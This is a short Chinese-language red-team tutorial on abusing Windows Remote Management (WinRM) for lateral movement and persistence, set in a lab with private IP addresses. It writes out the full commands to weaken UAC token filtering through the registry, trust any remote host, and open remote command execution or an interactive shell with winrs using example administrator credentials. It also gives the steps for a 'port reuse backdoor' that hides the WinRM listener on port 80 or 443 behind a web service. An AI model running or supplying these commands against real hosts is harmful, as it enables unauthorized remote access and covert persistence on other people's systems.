一、Windows 远程管理服务

WinRM代表Windows远程管理，是一种允许管理员远程执行系统管理任务的服务。通过HTTP（5985）或HTTPS SOAP（5986）执行通信，默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。使用此服务需要管理员级别凭据。

二、利用条件

利用条件略为鸡肋，需要双方都开启WinRM服务，Windows 2008 以上版本默认自动状态，Windows Vista/win7上必须手动启动，Windows 2012 之后的版本默认允许远程任意主机来管理，受uac影响，仅允许本地管理员组Administrator登录，其他需要登录需要修改注册表

命令：reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

测试环境：客户端：windows 2008 r2 192.168.214.136

目标机：windows 2012 r2 192.168.214.134

开启命令:

winrm quickconfig -q或Enable-PSRemoting -Force

客户端需要配置允许任意主机，目标不是windows server 2012以上，进行需要设置。

命令：winrm set winrm/config/Client @{TrustedHosts="*"}    需要权限（system权限）[出自:jiwo.org]

winrs -r:http://192.168.1.152:5985 -u:redteam\administrator -p:admin123 "whoami /all" 

同时ntml hash进行连接参考最后链接

winrs -r:http://192.168.1.152:5985 -u:redteam\administrator cmd //返回交回式shell

三、端口复用后门

将WinRM监听端口由5985改为80或者443，即使端口被web服务也不影响，配置目标WinRM服务，更改监听端口开启复用,该方法适用于有web服务的机器，不会开启新的端口.

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

winrs -r:http://192.168.1.152 -u:administrator -p:admin123 cmd

参考链接：

https://mp.weixin.qq.com/s/vNylEVGTZsfH6lVU80wnLA